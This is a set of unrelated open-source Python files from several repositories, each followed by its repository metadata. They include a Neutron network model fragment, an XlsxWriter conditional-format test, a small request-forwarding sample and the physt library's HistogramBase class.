mtu = sa.Column(sa.Integer, nullable=True)
vlan_transparent = sa.Column(sa.Boolean, nullable=True)
rbac_entries = orm.relationship(rbac_db_models.NetworkRBAC,
backref='network', lazy='joined',
cascade='all, delete, delete-orphan')
availability_zone_hints = sa.Column(sa.String(255))
dhcp_agents = orm.relationship(
'Agent', lazy='joined', viewonly=True,
secondary=agt.NetworkDhcpAgentBinding.__table__)
| MaximNevrov/neutron | neutron/db/models_v2.py | Python | apache-2.0 | 12,581 |
from ._terminator import Terminator
__all__ = ("Terminator",)
| nikitanovosibirsk/vedro | vedro/plugins/terminator/__init__.py | Python | apache-2.0 | 63 |
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2022, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
"""
Test assembling a complete Worksheet file.
"""
def test_assemble_xml_file(self):
"""Test writing a worksheet with conditional formatting."""
self.maxDiff = None
fh = StringIO()
worksheet = Worksheet()
worksheet._set_filehandle(fh)
worksheet.select()
worksheet.index = 0
worksheet.conditional_format('A1',
{'type': 'data_bar',
'data_bar_2010': True,
'min_type': 'formula',
'min_value': '=$B$1',
})
worksheet.conditional_format('A2:B2',
{'type': 'data_bar',
'bar_color': '#63C384',
'data_bar_2010': True,
'min_type': 'formula',
'min_value': '=$B$1',
'max_type': 'formula',
'max_value': '=$C$1',
})
worksheet.conditional_format('A3:C3',
{'type': 'data_bar',
'bar_color': '#FF555A',
'data_bar_2010': True,
'min_type': 'percentile',
'max_type': 'percentile',
'min_value': 10,
'max_value': 90,
})
worksheet._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
<dimension ref="A1"/>
<sheetViews>
<sheetView tabSelected="1" workbookViewId="0"/>
</sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<sheetData/>
<conditionalFormatting sqref="A1">
<cfRule type="dataBar" priority="1">
<dataBar>
<cfvo type="formula" val="$B$1"/>
<cfvo type="max"/>
<color rgb="FF638EC6"/>
</dataBar>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
<x14:id>{DA7ABA51-AAAA-BBBB-0001-000000000001}</x14:id>
</ext>
</extLst>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A2:B2">
<cfRule type="dataBar" priority="2">
<dataBar>
<cfvo type="formula" val="$B$1"/>
<cfvo type="formula" val="$C$1"/>
<color rgb="FF63C384"/>
</dataBar>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
<x14:id>{DA7ABA51-AAAA-BBBB-0001-000000000002}</x14:id>
</ext>
</extLst>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A3:C3">
<cfRule type="dataBar" priority="3">
<dataBar>
<cfvo type="percentile" val="10"/>
<cfvo type="percentile" val="90"/>
<color rgb="FFFF555A"/>
</dataBar>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
<x14:id>{DA7ABA51-AAAA-BBBB-0001-000000000003}</x14:id>
</ext>
</extLst>
</cfRule>
</conditionalFormatting>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{78C0D931-6437-407d-A8EE-F0AAD7539E65}">
<x14:conditionalFormattings>
<x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<x14:cfRule type="dataBar" id="{DA7ABA51-AAAA-BBBB-0001-000000000001}">
<x14:dataBar minLength="0" maxLength="100" border="1" negativeBarBorderColorSameAsPositive="0">
<x14:cfvo type="formula">
<xm:f>$B$1</xm:f>
</x14:cfvo>
<x14:cfvo type="autoMax"/>
<x14:borderColor rgb="FF638EC6"/>
<x14:negativeFillColor rgb="FFFF0000"/>
<x14:negativeBorderColor rgb="FFFF0000"/>
<x14:axisColor rgb="FF000000"/>
</x14:dataBar>
</x14:cfRule>
<xm:sqref>A1</xm:sqref>
</x14:conditionalFormatting>
<x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<x14:cfRule type="dataBar" id="{DA7ABA51-AAAA-BBBB-0001-000000000002}">
<x14:dataBar minLength="0" maxLength="100" border="1" negativeBarBorderColorSameAsPositive="0">
<x14:cfvo type="formula">
<xm:f>$B$1</xm:f>
</x14:cfvo>
<x14:cfvo type="formula">
<xm:f>$C$1</xm:f>
</x14:cfvo>
<x14:borderColor rgb="FF63C384"/>
<x14:negativeFillColor rgb="FFFF0000"/>
<x14:negativeBorderColor rgb="FFFF0000"/>
<x14:axisColor rgb="FF000000"/>
</x14:dataBar>
</x14:cfRule>
<xm:sqref>A2:B2</xm:sqref>
</x14:conditionalFormatting>
<x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<x14:cfRule type="dataBar" id="{DA7ABA51-AAAA-BBBB-0001-000000000003}">
<x14:dataBar minLength="0" maxLength="100" border="1" negativeBarBorderColorSameAsPositive="0">
<x14:cfvo type="percentile">
<xm:f>10</xm:f>
</x14:cfvo>
<x14:cfvo type="percentile">
<xm:f>90</xm:f>
</x14:cfvo>
<x14:borderColor rgb="FFFF555A"/>
<x14:negativeFillColor rgb="FFFF0000"/>
<x14:negativeBorderColor rgb="FFFF0000"/>
<x14:axisColor rgb="FF000000"/>
</x14:dataBar>
</x14:cfRule>
<xm:sqref>A3:C3</xm:sqref>
</x14:conditionalFormatting>
</x14:conditionalFormattings>
</ext>
</extLst>
</worksheet>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
| jmcnamara/XlsxWriter | xlsxwriter/test/worksheet/test_data_bar11.py | Python | bsd-2-clause | 8,784 |
import requests
import json
import logging
LOG = logging.getLogger(__name__)
class Forwarder(object):
def __init__(self):
this.fwd_url = 'http://localhost:9999/forward'
def forward(self, reason, host=None, data=None):
body = {
'reason': reason
}
if host is not None:
body['host'] = host
if data is not None:
body['data'] = data
resp = requests.post(this.fwd_url,
body=json.dumps(body))
| dscottcs/superluminal | superluminal/sample/forward_sample.py | Python | apache-2.0 | 510 |
"""HistogramBase - base for all histogram classes."""
from __future__ import annotations
import abc
import warnings
from typing import TYPE_CHECKING, cast
import numpy as np
from physt.binnings import BinningBase, as_binning
from physt.config import config
from physt.statistics import INVALID_STATISTICS
if TYPE_CHECKING:
from typing import (
Any,
ClassVar,
Collection,
Dict,
Iterable,
List,
Mapping,
Optional,
Tuple,
Type,
TypeVar,
Union,
)
import physt
from physt.binnings import BinningLike
from physt.typing_aliases import ArrayLike, Axis, DTypeLike
HistogramType = TypeVar("HistogramType", bound="HistogramBase")
# Various platforms have different default floating point dtypes.
_FREQUENCY_SUPPORTED_DTYPES: List[Type[np.number]] = [
np.int16,
np.int32, # Default in Windows
np.int64, # Default in 64-bit Linux
np.float16,
np.float32,
np.float64,
]
if hasattr(np, "float128"):
# Not present in Windows
_FREQUENCY_SUPPORTED_DTYPES.append(np.float128) # type: ignore
class HistogramBase(abc.ABC):
"""Histogram base class.
Behaviour shared by all histogram classes.
The most important daughter classes are:
- Histogram1D
- HistogramND
There are also special histogram types that are modifications of these classes.
The methods you should override:
- fill
- fill_n (optional)
- copy
- _update_dict (optional)
Underlying data type is int64 / float or an explicitly specified
other type (dtype).
Attributes
----------
_binnings : Schema for binning(s)
frequencies : np.ndarray
Bin contents
errors2 : np.ndarray
Square errors associated with the bin contents
_meta_data : dict
All meta-data (names, user-custom values, ...). Anything can be put in.
When exported, all information is kept.
_dtype : np.dtype
Type of the frequencies and also errors (int64, float64 or user-overridden)
_missed : array_like
Various storage for missed values in different histogram types
(1 value for multi-dimensional, 3 values for one-dimensional)
Invariants
----------
- Frequencies in the histogram should always be non-negative.
Many operations rely on that, but it is not always enforced.
(if you set config.free_arithmetics (see below), negative frequencies are also
allowed.
Arithmetics
-----------
Histograms offer standard arithmetic operators that by default allow only
meaningful application (i.e. addition / subtraction of two histograms
with matching or mutually adaptable bin sets, multiplication and division by a constant).
If you relax the criteria by setting `config.free_aritmetics` or inside
the config.enable_free_arithmetics() context manager, you are in addition
allowed to use any array-like with matching shape.
See Also
--------
histogram1d
histogram_nd
special
"""
def __init__(
self,
binnings: Iterable[BinningLike],
frequencies: Optional[ArrayLike] = None,
errors2: Optional[ArrayLike] = None,
*,
axis_names: Optional[Iterable[str]] = None,
dtype: Optional[DTypeLike] = None,
keep_missed: bool = True,
**kwargs,
):
"""Constructor
All keyword arguments not listed below become items in the _meta_data
dictionary.
Parameters
----------
binnings : Iterable of something that can be turned into binnnings
frequencies : Frequencies to fill bins with (default to zeros if not present)
errors2 : Squared errors for bins (default is equal to frequencies)
dtype : Dtype for bin contents
keep_missed : If True, keep information about bins that did not hit any bin
"""
self._binnings = [as_binning(binning) for binning in binnings]
new_kwargs = self.default_init_values.copy()
new_kwargs.update(kwargs)
kwargs = new_kwargs
# Frequencies + appropriate dtypes
if frequencies is None:
dtype = dtype or np.int64
self._frequencies = np.zeros(self.shape, dtype=dtype)
else:
if dtype is not None:
frequencies = np.asarray(frequencies, dtype=dtype)
else:
frequencies = np.asarray(frequencies)
if frequencies.dtype in self.SUPPORTED_DTYPES:
pass # OK
elif np.issubdtype(frequencies.dtype, np.integer):
frequencies = frequencies.astype(np.int64)
elif np.issubdtype(frequencies.dtype, np.floating):
frequencies = frequencies.astype(np.float64)
else:
raise ValueError(f"Frequencies of type {frequencies.dtype} not understood")
dtype = frequencies.dtype
self.frequencies = frequencies
self._dtype, _ = self._eval_dtype(dtype) # type: ignore
# Errors
if errors2 is None:
self.errors2 = abs(self._frequencies.copy())
else:
self.errors2 = np.asarray(errors2, dtype=self.dtype)
self.keep_missed = keep_missed
# Note: missed are dealt differently in 1D/ND cases
self._meta_data = kwargs.copy()
self.axis_names = tuple(axis_names or self.default_axis_names)
# "Protected" attributes
_binnings: List[BinningBase]
_frequencies: np.ndarray
_errors2: np.ndarray
_missed: np.ndarray
SUPPORTED_DTYPES: ClassVar[Collection[Type[np.number]]] = tuple(_FREQUENCY_SUPPORTED_DTYPES)
@property
def default_axis_names(self) -> List[str]:
"""Axis names to be used when an instance does not define them."""
return [f"axis{i}" for i in range(self.ndim)]
default_init_values: Dict[str, Any] = {}
@property
def meta_data(self) -> Dict[str, Any]:
"""A dictionary of non-numerical information about the histogram.
It contains several pre-defined ones, but you can add any other.
These are preserved when saving and also in operations.
"""
return self._meta_data
@property
def name(self) -> Optional[str]:
"""Name of the histogram (stored in meta-data)."""
return self._meta_data.get("name", None)
@name.setter
def name(self, value: str):
"""Name of the histogram.
In plotting, this will be used as label.
"""
self._meta_data["name"] = str(value)
@property
def title(self) -> Optional[str]:
"""Title of the histogram to be displayed when plotted (stored in meta-data).
If not specified, defaults to `name`.
"""
return self._meta_data.get("title", self.name)
@title.setter
def title(self, value: str):
"""Title of the histogram.
In plotting, this will be used as plot title.
"""
self._meta_data["title"] = str(value)
@property
def axis_names(self) -> Tuple[str, ...]:
"""Names of axes (stored in meta-data)."""
default = [f"axis{i}" for i in range(self.ndim)]
return tuple(self._meta_data.get("axis_names", None) or default)
@axis_names.setter
def axis_names(self, value: Iterable[str]):
# TODO: Check dimension for this
self._meta_data["axis_names"] = tuple(str(name) for name in value)
def _get_axis(self, name_or_index: Axis) -> int:
"""Get a zero-based index of an axis and check its existence."""
# TODO: Add unit test
if isinstance(name_or_index, int):
if name_or_index < 0 or name_or_index >= self.ndim:
raise ValueError(f"No axis {name_or_index}, must be from 0 to {self.ndim - 1}")
return name_or_index
if isinstance(name_or_index, str):
if name_or_index not in self.axis_names:
named_axes = [name for name in self.axis_names if name]
raise ValueError(
f"No axis with such name: {name_or_index}, available names: "
+ ", ".join((named_axes))
+ "In most places, you can also use numbers."
)
return self.axis_names.index(name_or_index)
raise TypeError(
f"Argument of type {type(name_or_index)} not understood, int or str expected."
)
@property
def shape(self) -> Tuple[int, ...]:
"""Shape of histogram's data.
Returns
-------
Tuple with the number of bins along each axis.
"""
return tuple(bins.bin_count for bins in self._binnings)
@property
def ndim(self) -> int:
"""Dimensionality of histogram's data.
i.e. the number of axes along which we bin the values.
"""
return len(self._binnings)
@classmethod
def _eval_dtype(cls, value: DTypeLike) -> Tuple[np.dtype, Union[np.iinfo, np.finfo]]:
"""Convert dtype into canonical form, check its applicability and return info.
Parameters
----------
value: Anything convertible to dtype
Returns
-------
value: Numpy dtype
type_info: Information about the dtype
"""
dtype: np.dtype = np.dtype(value)
if dtype.kind in "iu":
type_info: Union[np.iinfo, np.finfo] = np.iinfo(dtype)
elif dtype.kind == "f":
type_info = np.finfo(dtype)
else:
raise ValueError("Unsupported dtype. Only integer/floating-point types are supported.")
return dtype, type_info
@property
def dtype(self) -> np.dtype:
"""Data type of the bin contents."""
return self._dtype
@dtype.setter
def dtype(self, value: DTypeLike) -> None:
self.set_dtype(value)
def set_dtype(self, value: DTypeLike, *, check: bool = True) -> None:
"""Change data type of the bin contents.
Allowed conversions:
- from integral to float types
- between the same category of type (float/integer)
- from float types to integer if weights are trivial
Parameters
----------
value: np.dtype or something convertible to it.
check: If True (default), all values are checked against the limits
"""
# TODO? Deal with unsigned types
value, type_info = self._eval_dtype(value)
if value == self._dtype:
return
if self.dtype is None or np.can_cast(self.dtype, value):
pass # Ok
elif check:
if np.issubdtype(value, np.integer):
if self.dtype.kind == "f":
for array in (self.frequencies, self.errors2):
if np.any(array % 1.0):
raise ValueError("Data contain non-integer values.")
for array in (self.frequencies, self.errors2):
if np.any((array > type_info.max) | (array < type_info.min)):
raise ValueError("Data contain values outside the specified range.")
self._dtype = value
self._frequencies = self._frequencies.astype(value)
if self._errors2 is not None:
self._errors2 = self._errors2.astype(value)
if self._missed is not None:
self._missed = self._missed.astype(value)
def _coerce_dtype(self, other_dtype: DTypeLike) -> None:
"""Possibly change the bin content type to allow correct operations with other operand.
Parameters
----------
other_dtype : np.dtype or type
"""
other_dtype, _ = self._eval_dtype(other_dtype)
if self._dtype is None:
new_dtype = np.dtype(other_dtype)
else:
new_dtype = np.find_common_type([self._dtype, np.dtype(other_dtype)], [])
if new_dtype != self.dtype:
self.set_dtype(new_dtype)
@property
def bin_count(self) -> int:
"""Total number of bins."""
# TODO: Rename to size (in parallel with numpy/pandas)?
return int(np.product(self.shape))
@property
def frequencies(self) -> np.ndarray:
"""Frequencies (values, contents) of the histogram bins."""
return self._frequencies
@frequencies.setter
def frequencies(self, values: ArrayLike) -> None:
frequencies = np.asarray(values)
if frequencies.shape != self.shape:
raise ValueError("Values must have same dimension as bins.")
if np.any(frequencies < 0):
if config.free_arithmetics:
warnings.warn("Negative frequencies in the histogram.")
else:
raise ValueError("Cannot have negative frequencies.")
self._frequencies = frequencies
@property
def densities(self) -> np.ndarray:
"""Frequencies normalized by bin sizes.
Useful when bins are not of the same size.
"""
return self._frequencies / self.bin_sizes
@property
@abc.abstractmethod
def bin_sizes(self) -> np.ndarray:
raise NotImplementedError
def normalize(self, inplace: bool = False, percent: bool = False) -> "HistogramBase":
"""Normalize the histogram, so that the total weight is equal to 1.
Parameters
----------
inplace: If True, updates itself. If False (default), returns copy
percent: If True, normalizes to percent instead of 1. Default: False
Returns
-------
either modified copy or self
See also
--------
densities
HistogramND.partial_normalize
"""
if inplace:
self /= self.total * (0.01 if percent else 1)
return self
else:
return self / self.total * (100 if percent else 1)
@property
def errors2(self) -> np.ndarray:
"""Squares of the bin errors."""
return self._errors2
@errors2.setter
def errors2(self, values: ArrayLike) -> None:
array: np.ndarray = np.asarray(values)
if array.shape != self.shape:
raise ValueError("Square errors must have same dimension as bins.")
if np.any(array < 0):
raise ValueError("Cannot have negative square errors.")
self._errors2 = array
@property
def errors(self) -> np.ndarray:
"""Bin errors."""
return np.sqrt(self.errors2)
@property
def total(self) -> float:
"""Total number (sum of weights) of entries excluding underflow and overflow."""
return self._frequencies.sum().item()
@property
def missed(self) -> float:
"""Total number (weight) of entries that missed the bins."""
return self._missed.sum().item()
def is_adaptive(self) -> bool:
"""Whether the binning can be changed with operations."""
# TODO: remove in favour of adaptive property
return all(binning.is_adaptive() for binning in self._binnings)
def set_adaptive(self, value: bool = True):
"""Change the histogram binning to (non)adaptive.
This requires binning in all dimensions to allow this.
"""
# TODO: remove in favour of adaptive property
if not all(b.adaptive_allowed for b in self._binnings):
raise ValueError("All binnings must allow adaptive behaviour.")
for binning in self._binnings:
binning.set_adaptive(value)
@property
def adaptive(self) -> bool:
# TODO: Remove?
return self.is_adaptive()
@adaptive.setter
def adaptive(self, value: bool):
self.set_adaptive(value)
def _change_binning(
self,
new_binning: BinningBase,
bin_map: Iterable[Tuple[int, int]],
axis: Axis = 0,
):
"""Set new binnning and update the bin contents according to a map.
Fills frequencies and errors with 0.
It's the caller's responsibility to provide correct binning and map.
Parameters
----------
new_binning: physt.binnings.BinningBase
bin_map: Tuples containing bin indices (old, new)
axis: What axis does the binning describe(0..ndim-1)
"""
axis = self._get_axis(axis)
self._reshape_data(new_binning.bin_count, bin_map, axis)
self._binnings[axis] = new_binning
def merge_bins(
self: "HistogramType",
amount: Optional[int] = None,
*,
min_frequency: Optional[float] = None,
axis: Optional[Axis] = None,
inplace: bool = False,
) -> "HistogramType":
"""Reduce the number of bins and add their content:
Parameters
----------
amount: How many adjacent bins to join together.
min_frequency: Try to have at least this value in each bin
(this is not enforce e.g. for minima between high bins)
axis: On which axis to do this (None => all)
inplace: Whether to modify this histogram or return a new one
"""
if not inplace:
histogram = self.copy()
histogram.merge_bins(amount, min_frequency=min_frequency, axis=axis, inplace=True)
return histogram
elif axis is None:
for i in range(self.ndim):
self.merge_bins(amount=amount, min_frequency=min_frequency, axis=i, inplace=True)
else:
axis = self._get_axis(axis)
if amount is not None:
if not amount == int(amount):
raise ValueError(f"Amount must be integer, {amount} found.")
bin_map = [(i, i // amount) for i in range(self.shape[axis])]
elif min_frequency is not None:
if self.ndim == 1:
check = self.frequencies
else:
# TODO: Check this!
from physt.histogram_nd import HistogramND
check = cast(HistogramND, self).projection(axis).frequencies
bin_map = []
current_new = 0
current_sum = 0
for i, freq in enumerate(check):
if freq >= min_frequency and current_sum > 0:
current_sum = 0
current_new += 1
bin_map.append((i, current_new))
current_sum += freq
if current_sum > min_frequency:
current_sum = 0
current_new += 1
else:
raise NotImplementedError("Not yet implemented.")
new_binning = self._binnings[axis].apply_bin_map(bin_map)
self._change_binning(new_binning, bin_map, axis=axis)
return self
def _reshape_data(self, new_size: int, bin_map, axis: int = 0):
"""Reshape data to match new binning schema.
Fills frequencies and errors with 0.
Parameters
----------
new_size: New size along the axis
bin_map: Iterable[(old, new)] or int or None
If None, we can keep the data unchanged.
If int, it is offset by which to shift the data (can be 0)
If iterable, pairs specify which old bin should go into which new bin
axis: On which axis to apply
"""
if bin_map is None:
return
new_shape = list(self.shape)
new_shape[axis] = new_size
new_frequencies = np.zeros(new_shape, dtype=self._frequencies.dtype)
new_errors2 = np.zeros(new_shape, dtype=self._frequencies.dtype)
self._apply_bin_map(
old_frequencies=self._frequencies,
new_frequencies=new_frequencies,
old_errors2=self._errors2,
new_errors2=new_errors2,
bin_map=bin_map,
axis=axis,
)
self._frequencies = new_frequencies
self._errors2 = new_errors2
def _apply_bin_map(
self,
old_frequencies: np.ndarray,
new_frequencies: np.ndarray,
old_errors2: np.ndarray,
new_errors2: np.ndarray,
bin_map: Union[Iterable[Tuple[int, int]], int],
axis: int,
):
"""Fill new data arrays using a map.
Parameters
----------
old_frequencies : Source of frequencies data
new_frequencies : Target of frequencies data
old_errors2 : Source of errors data
new_errors2 : Target of errors data
bin_map: Iterable[(old, new)] or int or None
As in _reshape_data
axis: On which axis to apply
See also
--------
HistogramBase._reshape_data
"""
if old_frequencies is not None and old_frequencies.shape[axis] > 0:
if isinstance(bin_map, int):
new_index: List[Union[int, slice]] = [slice(None) for i in range(self.ndim)]
new_index[axis] = slice(bin_map, bin_map + old_frequencies.shape[axis])
new_frequencies[tuple(new_index)] += old_frequencies
new_errors2[tuple(new_index)] += old_errors2
else:
for (old, new) in bin_map: # Generic enough
new_index = [slice(None) for i in range(self.ndim)]
new_index[axis] = new
old_index: List[Union[int, slice]] = [slice(None) for i in range(self.ndim)]
old_index[axis] = old
new_frequencies[tuple(new_index)] += old_frequencies[tuple(old_index)]
new_errors2[tuple(new_index)] += old_errors2[tuple(old_index)]
def has_same_bins(self, other: "HistogramBase") -> bool:
"""Whether two histograms share the same binning."""
if self.shape != other.shape:
return False
elif self.ndim == 1:
return np.allclose(self.bins, other.bins)
for i in range(self.ndim):
if not np.allclose(self.bins[i], other.bins[i]):
return False
return True
def copy(self: "HistogramType", *, include_frequencies: bool = True) -> "HistogramType":
"""Copy the histogram.
Parameters
----------
include_frequencies : If false, all frequencies are set to zero.
"""
if include_frequencies:
frequencies = np.copy(self.frequencies)
missed = self._missed.copy()
errors2 = np.copy(self.errors2)
else:
frequencies = np.zeros_like(self._frequencies)
errors2 = np.zeros_like(self._errors2)
missed = np.zeros_like(self._missed)
a_copy = self.__class__.__new__(self.__class__)
a_copy._binnings = [binning.copy() for binning in self._binnings]
a_copy._dtype = self.dtype
a_copy._frequencies = frequencies
a_copy._errors2 = errors2
a_copy._meta_data = self._meta_data.copy()
a_copy.keep_missed = self.keep_missed
a_copy._missed = missed
return a_copy
@abc.abstractmethod
def select(self, axis: Axis, index: Union[int, slice], *, force_copy: bool = False) -> Any:
"""Select in an axis.
Parameters
----------
axis: Axis, in which we select.
index: Index of bin (as in numpy).
force_copy: If True, identity slice force a copy to be made.
"""
@property
def binnings(self) -> List[BinningBase]:
"""The binnings.
Note: Please, do not try to update the objects themselves.
"""
return self._binnings
@property
@abc.abstractmethod
def bins(self):
...
@abc.abstractmethod
def fill(self, value: float, weight: float = 1, **kwargs) -> Union[None, int, Tuple[int, ...]]:
"""Update histogram with a new value.
It is an in-place operation.
Parameters
----------
value: Value to be added. Can be scalar or array depending on the histogram type.
weight: Weight of the value
Note
----
May change the dtype if weight is set
"""
# TODO: Perhaps it should just return None?
...
@abc.abstractmethod
def fill_n(
self, values: ArrayLike, weights: Optional[ArrayLike] = None, *, dropna: bool = True
):
"""Update histogram with more values at once.
It is an in-place operation.
Parameters
----------
values: Values to add
weights: Optional weights to assign to each value
drop_na: If true (default), all nan's are skipped.
Note
----
This method should be overloaded with a more efficient one.
May change the dtype if weight is set.
"""
...
@property
def plot(self) -> "physt.plotting.PlottingProxy":
"""Proxy to plotting.
This attribute is a special proxy to plotting. In the most
simple cases, it can be used as a method. For more sophisticated
use, see the documentation for physt.plotting package.
"""
from .plotting import PlottingProxy
return PlottingProxy(self)
def to_dict(self) -> Dict[str, Any]:
"""Dictionary with all data in the histogram.
This is used for export into various formats (e.g. JSON)
If a descendant class needs to update the dictionary in some way
(put some more information), override the _update_dict method.
"""
result: Dict[str, Any] = dict()
result["histogram_type"] = type(self).__name__
result["binnings"] = [binning.to_dict() for binning in self._binnings]
if self.frequencies is not None:
result["frequencies"] = self.frequencies.tolist()
else:
result["frequencies"] = None
result["dtype"] = str(np.dtype(self.dtype))
# TODO: Optimize for _errors == _frequencies
result["errors2"] = self.errors2.tolist()
result["meta_data"] = self._meta_data
result["missed"] = self._missed.tolist()
result["missed_keep"] = self.keep_missed
self._update_dict(result)
return result
def _update_dict(self, a_dict: Dict[str, Any]) -> None:
"""Update the dictionary for export.
Override if you want to customize the process.
Parameters
----------
a_dict : Dictionary exported by the default implementation of to_dict
"""
pass
@classmethod
def _kwargs_from_dict(cls, a_dict: Mapping[str, Any]) -> Dict[str, Any]:
"""Modify __init__ arguments from an external dictionary.
Template method for from dict.
Override if necessary (like it's done in Histogram1D).
"""
kwargs: Dict[str, Any] = {
"binnings": [
BinningBase.from_dict(binning_data) for binning_data in a_dict["binnings"]
],
"dtype": np.dtype(a_dict["dtype"]),
"frequencies": a_dict.get("frequencies"),
"errors2": a_dict.get("errors2"),
}
if "missed" in a_dict:
kwargs["missed"] = a_dict["missed"]
kwargs.update(a_dict.get("meta_data", {}))
if len(kwargs["binnings"]) > 2:
kwargs["dimension"] = len(kwargs["binnings"])
return kwargs
@classmethod
def from_dict(cls, a_dict: Mapping[str, Any]) -> "HistogramBase":
"""Create an instance from a dictionary.
If customization is necessary, override the _from_dict_kwargs
template method, not this one.
"""
kwargs = cls._kwargs_from_dict(a_dict)
return cls(**kwargs)
def to_json(self, path: Optional[str] = None, **kwargs) -> str:
"""Convert to JSON representation.
Parameters
----------
path: Where to write the JSON.
Returns
-------
The JSON representation.
"""
from .io import save_json
return save_json(self, path, **kwargs)
def __repr__(self):
if self.name:
return f"{self.__class__.__name__}('{self.name}', bins={self.shape}, total={self.total}, dtype={self.dtype})"
return (
f"{self.__class__.__name__}(bins={self.shape}, total={self.total}, dtype={self.dtype})"
)
def __add__(self, other):
new = self.copy()
new += other
if isinstance(other, HistogramBase):
new._meta_data = self._merge_meta_data(self, other)
return new
def __radd__(self, other):
if other == 0: # Enable sum()
return self
return self + other
def __iadd__(self, other):
if isinstance(other, HistogramBase):
if other.ndim != self.ndim:
raise ValueError("Cannot add histograms with different dimensions.")
if self.has_same_bins(other):
# print("Has same!!!!!!!!!!")
self._coerce_dtype(other.dtype)
self.frequencies = self.frequencies + other.frequencies
self.errors2 = self.errors2 + other.errors2
self._missed += other._missed
elif self.is_adaptive():
if other.missed > 0:
raise ValueError("Cannot adapt histogram with missed values.")
other = other.copy()
other.set_adaptive(True)
self._coerce_dtype(other.dtype)
for i in range(self.ndim):
new_bins = self._binnings[i].copy()
map1, map2 = new_bins.adapt(other._binnings[i])
self._change_binning(new_bins, map1, axis=i)
other._change_binning(new_bins, map2, axis=i)
self.frequencies = self.frequencies + other.frequencies
self.errors2 = self.errors2 + other.errors2
else:
raise ValueError("Incompatible binning")
if hasattr(self, "_stats") and hasattr(other, "_stats"):
self._stats += other._stats
elif config.free_arithmetics:
array = np.asarray(other)
self._coerce_dtype(array.dtype)
self.frequencies = self.frequencies + array
self.errors2 = self.errors2 + abs(array)
self._missed = self._missed * np.nan # TODO: Any reasonable interpretation?
self._stats = INVALID_STATISTICS
else:
raise TypeError(f"Only histograms can be added together. {type(other)} found instead.")
return self
def __sub__(self, other):
new = self.copy()
new -= other
if isinstance(other, HistogramBase):
new._meta_data = self._merge_meta_data(self, other)
return new
def __isub__(self, other):
warnings.warn("Subtracting histograms is considered to be a bad idea.")
if isinstance(other, HistogramBase):
if config.free_arithmetics:
self += other * (-1)
else:
adapted_self = self + 0 * other
adapted_other = 0 * self + other
self.frequencies = adapted_self.frequencies - adapted_other.frequencies
self.errors2 = adapted_self.errors2 + adapted_other.errors2
self._missed -= other._missed
self._stats = INVALID_STATISTICS
return self
array = np.asarray(other)
return self.__iadd__(array * (-1))
def __mul__(self, other: Any):
new = self.copy()
new *= other
return new
def __imul__(self, other: Any):
if isinstance(other, HistogramBase):
raise TypeError("Multiplication of two histograms is not supported.")
if np.isscalar(other):
array = np.asarray(other)
scalar = cast(float, other)
try:
self._coerce_dtype(array.dtype)
except ValueError as v:
raise TypeError(str(v)) from v
self.frequencies = self.frequencies * scalar
self.errors2 = self.errors2 * scalar ** 2
self._missed = self._missed * scalar
if hasattr(self, "_stats"):
self._stats = self._stats * scalar
elif config.free_arithmetics: # Treat other as array-like
array = np.asarray(other)
self._coerce_dtype(array.dtype)
self.frequencies = self.frequencies * array
self.errors2 = self.errors2 * array ** 2
if hasattr(self, "_stats"):
self._stats = INVALID_STATISTICS
self._missed = self._missed * np.nan
else:
raise TypeError("Histograms may be multiplied only by a constant.")
return self
def __rmul__(self, other):
return self * other
def __truediv__(self, other):
new = self.copy()
new /= other
return new
def __itruediv__(self, other):
if isinstance(other, HistogramBase):
raise TypeError("Division of two histograms is not supported.")
elif np.isscalar(other):
self._coerce_dtype(np.float64)
self.frequencies = self.frequencies / other
self.errors2 = self.errors2 / other ** 2
self._missed /= other
if hasattr(self, "_stats"):
self._stats *= 1 / other
elif config.free_arithmetics: # Treat other as array-like
self._coerce_dtype(np.float64)
array = np.asarray(other)
self.frequencies = self.frequencies / array
self.errors2 = self.errors2 / array ** 2
if hasattr(self, "_stats"):
self._stats = INVALID_STATISTICS
self._missed /= np.nan
else:
raise TypeError("Histograms may be divided only by a constant.")
return self
def __lshift__(self, value):
"""Convenience alias for fill.
Because of the limit to argument count, weight is not supported.
"""
self.fill(value)
@classmethod
def _merge_meta_data(cls, first: "HistogramBase", second: "HistogramBase") -> dict:
"""Merge meta data of two histograms leaving only the equal values.
(Used in addition and subtraction)
"""
keys = set(first._meta_data.keys())
keys = keys.union(set(second._meta_data.keys()))
return {
key: (
first._meta_data.get(key, None)
if first._meta_data.get(key, None) == second._meta_data.get(key, None)
else None
)
for key in keys
}
def __array__(self) -> np.ndarray:
"""Convert to numpy array.
Returns
-------
The array of frequencies
See also
--------
frequencies
"""
return self.frequencies
| janpipek/physt | physt/histogram_base.py | Python | mit | 34,929 |
